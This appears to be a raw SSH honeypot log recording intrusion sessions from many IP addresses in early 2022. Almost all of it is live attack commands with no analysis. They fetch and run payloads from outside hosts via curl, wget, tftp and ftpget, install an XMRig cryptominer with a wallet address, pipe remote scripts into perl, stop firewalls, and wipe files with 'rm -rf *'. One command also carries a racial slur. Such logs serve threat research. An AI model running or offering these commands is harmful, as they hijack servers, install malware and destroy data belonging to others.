cat > /dev/shm/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 139.209.222.134 22-Feb-2022 06:42:56 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 42.194.138.246 22-Feb-2022 06:43:37 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 121.200.53.148 22-Feb-2022 06:45:47 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 110.42.236.48 22-Feb-2022 07:06:04 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 8.17.89.11 22-Feb-2022 07:08:27 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 196.221.203.98 22-Feb-2022 07:13:34 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 173.82.48.12 22-Feb-2022 13:00:53 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 183.77.156.89 22-Feb-2022 13:04:12 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 112.46.68.25 22-Feb-2022 15:02:07 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 182.139.135.66 22-Feb-2022 15:10:30 ssh2 root
Exec echo -n stjrd1hy|md5sum;uname -a
echo -n stjrd1hy|md5sum
uname -a

From 101.43.101.163 22-Feb-2022 15:27:36 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 161.35.116.146 22-Feb-2022 19:51:08 ssh2 root
Exec cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c; nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c;curl -s 185.244.149.237/.cache|perl;wget -qO - 185.244.149.237/.cache|perl
cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c
nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c
curl -s 185.244.149.237/.cache|perl
wget -qO - 185.244.149.237/.cache|perl

From 104.248.82.49 23-Feb-2022 16:27:02 ssh2 root
Exec cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c; nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c
cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c
nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c

From 179.43.168.126 23-Feb-2022 19:12:36 ssh2 root
Exec uname -a; cd /tmp; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://179.43.175.170/putkite/quickr1n.sh; curl -O http://179.43.175.170/putkite/quickr1n.sh; chmod 777 *; sh quickr1n.sh; echo storytimeDedicated
uname -a
cd /tmp
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
wget http://179.43.175.170/putkite/quickr1n.sh
curl -O http://179.43.175.170/putkite/quickr1n.sh
chmod 777 *
sh quickr1n.sh
echo storytimeDedicated

From 46.97.177.23 23-Feb-2022 20:03:31 ssh2 root
w
uname -a
cat /etc/issue
ifconfig
cat /proc/cpuinfo
cd /root
ls -a
ls -a
cd /root
ls
ls -a
cd .ssh
ls -a
ls
cd .ssh
ls
ls -a
yum update -y
apt-get update -y
cd /dev/shm
ls -a
wget http://soho.altervista.org/asssja/goshs1.zip
wget http://soho.altervista.org/asssja/goshs1.zip
cd /tmp
wget http://soho.altervista.org/asssja/goshs1.zip
cd /root
ls
cd OpenOffice.org1.0
ls -a
ll
ps x
/usr/bin/startx
cd /var/www/
s
ls
cd /var/www/html
s -as
ls -as
w
uname -a
id
cat /etc/passwd

From 199.195.251.203 27-Feb-2022 01:46:43 ssh2 root
Exec cd /tmp || cd /var/tmp || cd /dev/shm || cd /mnt || cd /root;curl -o linux_386 http://164.92.207.64:9669/linux_386 || wget http://164.92.207.64:9669/linux_386;curl -o linux_arm http://164.92.207.64:9669/linux_arm || wget http://164.92.207.64:9669/linux_arm;curl -o linux_arm64 http://164.92.207.64:9669/linux_arm64 || wget http://164.92.207.64:9669/linux_arm64;curl -o linux_mips http://164.92.207.64:9669/linux_mips || wget http://164.92.207.64:9669/linux_mips;curl -o linux_mips64 http://164.92.207.64:9669/linux_mips64 || wget http://164.92.207.64:9669/linux_mips64;curl -o linux_x86_64 http://164.92.207.64:9669/linux_x86_64 || wget http://164.92.207.64:9669/linux_x86_64;chmod +x *; ./linux_386; ./linux_arm; ./linux_arm64; ./linux_mips; ./linux_mips64; ./linux_x86_64;
cd /tmp || cd /var/tmp || cd /dev/shm || cd /mnt || cd /root
curl -o linux_386 http://164.92.207.64:9669/linux_386 || wget http://164.92.207.64:9669/linux_386
curl -o linux_arm http://164.92.207.64:9669/linux_arm || wget http://164.92.207.64:9669/linux_arm
curl -o linux_arm64 http://164.92.207.64:9669/linux_arm64 || wget http://164.92.207.64:9669/linux_arm64
curl -o linux_mips http://164.92.207.64:9669/linux_mips || wget http://164.92.207.64:9669/linux_mips
curl -o linux_mips64 http://164.92.207.64:9669/linux_mips64 || wget http://164.92.207.64:9669/linux_mips64
curl -o linux_x86_64 http://164.92.207.64:9669/linux_x86_64 || wget http://164.92.207.64:9669/linux_x86_64
chmod +x *
./linux_386
./linux_arm
./linux_arm64
./linux_mips
./linux_mips64
./linux_x86_64
Exec cd /tmp || cd /var/tmp || cd /dev/shm || cd /mnt || cd /root;curl -o linux_386 http://164.92.207.64:9669/linux_386 || wget http://164.92.207.64:9669/linux_386;curl -o linux_arm http://164.92.207.64:9669/linux_arm || wget http://164.92.207.64:9669/linux_arm;curl -o linux_arm64 http://164.92.207.64:9669/linux_arm64 || wget http://164.92.207.64:9669/linux_arm64;curl -o linux_mips http://164.92.207.64:9669/linux_mips || wget http://164.92.207.64:9669/linux_mips;curl -o linux_mips64 http://164.92.207.64:9669/linux_mips64 || wget http://164.92.207.64:9669/linux_mips64;curl -o linux_x86_64 http://164.92.207.64:9669/linux_x86_64 || wget http://164.92.207.64:9669/linux_x86_64;chmod +x *; ./linux_386; ./linux_arm; ./linux_arm64; ./linux_mips; ./linux_mips64; ./linux_x86_64;
cd /tmp || cd /var/tmp || cd /dev/shm || cd /mnt || cd /root
curl -o linux_386 http://164.92.207.64:9669/linux_386 || wget http://164.92.207.64:9669/linux_386
curl -o linux_arm http://164.92.207.64:9669/linux_arm || wget http://164.92.207.64:9669/linux_arm
curl -o linux_arm64 http://164.92.207.64:9669/linux_arm64 || wget http://164.92.207.64:9669/linux_arm64
curl -o linux_mips http://164.92.207.64:9669/linux_mips || wget http://164.92.207.64:9669/linux_mips
curl -o linux_mips64 http://164.92.207.64:9669/linux_mips64 || wget http://164.92.207.64:9669/linux_mips64
curl -o linux_x86_64 http://164.92.207.64:9669/linux_x86_64 || wget http://164.92.207.64:9669/linux_x86_64
chmod +x *
./linux_386
./linux_arm
./linux_arm64
./linux_mips
./linux_mips64
./linux_x86_64

From 139.59.21.115 27-Feb-2022 22:35:40 ssh2 root
Exec uname -a ; nproc
uname -a
nproc

From 89.253.253.224 1-Mar-2022 07:11:53 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 115.146.182.160 4-Mar-2022 10:22:41 ssh2 root
Exec nproc; uname -a
nproc
uname -a

From 179.43.175.170 4-Mar-2022 12:51:38 ssh2 root
Exec cd /tmp; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://179.43.175.170/putkite/quickr1n.sh; curl -O http://179.43.175.170/putkite/quickr1n.sh; chmod 777 *; sh quickr1n.sh; echo storytime
cd /tmp
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
wget http://179.43.175.170/putkite/quickr1n.sh
curl -O http://179.43.175.170/putkite/quickr1n.sh
chmod 777 *
sh quickr1n.sh
echo storytime

From 179.43.175.170 5-Mar-2022 10:02:13 ssh2 root
Exec cd /tmp; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://179.43.175.170/putkite/quickr1n.sh; curl -O http://179.43.175.170/putkite/quickr1n.sh; chmod 777 *; sh quickr1n.sh; echo storytime
cd /tmp
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
wget http://179.43.175.170/putkite/quickr1n.sh
curl -O http://179.43.175.170/putkite/quickr1n.sh
chmod 777 *
sh quickr1n.sh
echo storytime

From 185.245.62.231 7-Mar-2022 04:49:57 ssh2 root
Exec cd /etc/; wget http://185.245.62.231/test.sh; chmod 777 test.sh; ./test.sh;
cd /etc/
wget http://185.245.62.231/test.sh
chmod 777 test.sh
./test.sh

From 107.189.7.13 7-Mar-2022 12:45:17 ssh2 root
Exec payload
payload

From 20.73.164.164 11-Mar-2022 00:26:52 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.31.98.122/keenzeuonions; curl -O http://194.31.98.122/keenzeuonions; chmod 777 keenzeuonions; sh keenzeuonions; tftp 194.31.98.122 -c get keenzeuonions; chmod 777 bins.sh; sh keenzeuonions; tftp -r .sh -g 194.31.98.122; chmod 777 .keenzeuonions; sh .keenzeuonions; ftpget -v -u anonymous -p anonymous -P 21 194.31.98.122 .keenzeuonions .keenzeuonions; sh .keenzeuonions; rm -rf sh keenzeuonions .keenzeuonions .keenzeuonions; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.31.98.122/keenzeuonions
curl -O http://194.31.98.122/keenzeuonions
chmod 777 keenzeuonions
sh keenzeuonions
tftp 194.31.98.122 -c get keenzeuonions
chmod 777 bins.sh
sh keenzeuonions
tftp -r .sh -g 194.31.98.122
chmod 777 .keenzeuonions
sh .keenzeuonions
ftpget -v -u anonymous -p anonymous -P 21 194.31.98.122 .keenzeuonions .keenzeuonions
sh .keenzeuonions
rm -rf sh keenzeuonions .keenzeuonions .keenzeuonions
rm -rf *

From 20.73.164.164 11-Mar-2022 11:26:27 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.31.98.122/keenzeuonions; curl -O http://194.31.98.122/keenzeuonions; chmod 777 keenzeuonions; sh keenzeuonions; tftp 194.31.98.122 -c get keenzeuonions; chmod 777 bins.sh; sh keenzeuonions; tftp -r .sh -g 194.31.98.122; chmod 777 .keenzeuonions; sh .keenzeuonions; ftpget -v -u anonymous -p anonymous -P 21 194.31.98.122 .keenzeuonions .keenzeuonions; sh .keenzeuonions; rm -rf sh keenzeuonions .keenzeuonions .keenzeuonions; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.31.98.122/keenzeuonions
curl -O http://194.31.98.122/keenzeuonions
chmod 777 keenzeuonions
sh keenzeuonions
tftp 194.31.98.122 -c get keenzeuonions
chmod 777 bins.sh
sh keenzeuonions
tftp -r .sh -g 194.31.98.122
chmod 777 .keenzeuonions
sh .keenzeuonions
ftpget -v -u anonymous -p anonymous -P 21 194.31.98.122 .keenzeuonions .keenzeuonions
sh .keenzeuonions
rm -rf sh keenzeuonions .keenzeuonions .keenzeuonions
rm -rf *

From 20.205.100.164 13-Mar-2022 22:36:17 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/onions1337; curl -O http://45.90.161.105/onions1337; chmod 777 onions1337; sh onions1337; tftp 45.90.161.105 -c get bins.sh; chmod 777 onions1337; sh onions1337; tftp -r .sh -g 45.90.161.105; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh onions1337 .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.90.161.105/onions1337
curl -O http://45.90.161.105/onions1337
chmod 777 onions1337
sh onions1337
tftp 45.90.161.105 -c get bins.sh
chmod 777 onions1337
sh onions1337
tftp -r .sh -g 45.90.161.105
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh
sh .sh
rm -rf sh onions1337 .sh .sh
rm -rf *
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 20.200.215.186 14-Mar-2022 02:27:56 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/onions1337; curl -O http://45.90.161.105/onions1337; chmod 777 onions1337; sh onions1337; tftp 45.90.161.105 -c get bins.sh; chmod 777 onions1337; sh onions1337; tftp -r .sh -g 45.90.161.105; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh onions1337 .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.90.161.105/onions1337
curl -O http://45.90.161.105/onions1337
chmod 777 onions1337
sh onions1337
tftp 45.90.161.105 -c get bins.sh
chmod 777 onions1337
sh onions1337
tftp -r .sh -g 45.90.161.105
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh
sh .sh
rm -rf sh onions1337 .sh .sh
rm -rf *

From 118.123.241.53 14-Mar-2022 03:14:06 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.123.241.53:2365/64linux;chmod 777 64linux;./64linux;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://118.123.241.53:2365/64linux
chmod 777 64linux
./64linux

From 118.123.241.53 14-Mar-2022 03:28:30 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.123.241.53:2365/config.json;wget -c http://118.123.241.53:2365/xmrig;chmod 777 xmrig;./xmrig;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://118.123.241.53:2365/config.json
wget -c http://118.123.241.53:2365/xmrig
chmod 777 xmrig
./xmrig

From 111.229.197.140 15-Mar-2022 05:29:32 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 1.220.98.197 17-Mar-2022 19:29:22 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/onions1337; curl -O http://45.90.161.105/onions1337; chmod 777 onions1337; sh onions1337; tftp 45.90.161.105 -c get bins.sh; chmod 777 onions1337; sh onions1337; tftp -r .sh -g 45.90.161.105; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh onions1337 .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.90.161.105/onions1337
curl -O http://45.90.161.105/onions1337
chmod 777 onions1337
sh onions1337
tftp 45.90.161.105 -c get bins.sh
chmod 777 onions1337
sh onions1337
tftp -r .sh -g 45.90.161.105
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh
sh .sh
rm -rf sh onions1337 .sh .sh
rm -rf *
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 159.223.232.102 19-Mar-2022 01:02:59 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://213.232.235.203/0x83911d24Fx.sh; curl -O http://213.232.235.203/0x83911d24Fx.sh; chmod 777 0x83911d24Fx.sh; sh 0x83911d24Fx.sh; tftp 157.230.119.179 -c get 0xt984767.sh; chmod 777 0xft6426467.sh; sh 0xft6426467.sh; tftp -r 0xtf2984767.sh -g 157.230.119.179 ; chmod 777 0xtf2984767.sh; sh 0xtf2984767.sh; ftpget -v -u anonymous -p anonymous -P 21 157.230.119.179 0xft6426467.sh 0xft6426467.sh; sh 0xft6426467.sh; rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://213.232.235.203/0x83911d24Fx.sh
curl -O http://213.232.235.203/0x83911d24Fx.sh
chmod 777 0x83911d24Fx.sh
sh 0x83911d24Fx.sh
tftp 157.230.119.179 -c get 0xt984767.sh
chmod 777 0xft6426467.sh
sh 0xft6426467.sh
tftp -r 0xtf2984767.sh -g 157.230.119.179
chmod 777 0xtf2984767.sh
sh 0xtf2984767.sh
ftpget -v -u anonymous -p anonymous -P 21 157.230.119.179 0xft6426467.sh 0xft6426467.sh
sh 0xft6426467.sh
rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh
rm -rf *

From 2.56.59.96 19-Mar-2022 02:37:16 ssh2 root
Exec wget 37.0.11.224/x86; chmod 777 x86; ./x86 nigga
wget 37.0.11.224/x86
chmod 777 x86
./x86 nigga

From 179.43.168.126 21-Mar-2022 04:45:42 ssh2 root
Exec cd /tmp; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://179.43.175.170/putkite/quickr1n.sh; chmod 777 *; sh quickr1n.sh; echo storytime
cd /tmp
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
wget http://179.43.175.170/putkite/quickr1n.sh
chmod 777 *
sh quickr1n.sh
echo storytime

From 20.45.183.39 22-Mar-2022 00:41:34 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/onions1337; curl -O http://45.90.161.105/onions1337; chmod 777 onions1337; sh onions1337; tftp 45.90.161.105 -c get bins.sh; chmod 777 onions1337; sh onions1337; tftp -r .sh -g 45.90.161.105; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh onions1337 .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.90.161.105/onions1337
curl -O http://45.90.161.105/onions1337
chmod 777 onions1337
sh onions1337
tftp 45.90.161.105 -c get bins.sh
chmod 777 onions1337
sh onions1337
tftp -r .sh -g 45.90.161.105
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh
sh .sh
rm -rf sh onions1337 .sh .sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/onions1337; curl -O http://45.90.161.105/onions1337; chmod 777 onions1337; sh onions1337; tftp 45.90.161.105 -c get bins.sh; chmod 777 onions1337; sh onions1337; tftp -r .sh -g 45.90.161.105; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh onions1337 .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.90.161.105/onions1337
curl -O http://45.90.161.105/onions1337
chmod 777 onions1337
sh onions1337
tftp 45.90.161.105 -c get bins.sh
chmod 777 onions1337
sh onions1337
tftp -r .sh -g 45.90.161.105
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh
sh .sh
rm -rf sh onions1337 .sh .sh
rm -rf *

From 179.43.175.108 22-Mar-2022 02:55:30 ssh2 root
Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; cd /tmp; wget http://179.43.175.108/putkite/quickr1n.sh; sh quickr1n.sh
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
cd /tmp
wget http://179.43.175.108/putkite/quickr1n.sh
sh quickr1n.sh

From 179.43.175.108 22-Mar-2022 06:11:12 ssh2 root
Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; cd /tmp; wget http://179.43.175.108/putkite/quickr1n.sh; sh quickr1n.sh
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
cd /tmp
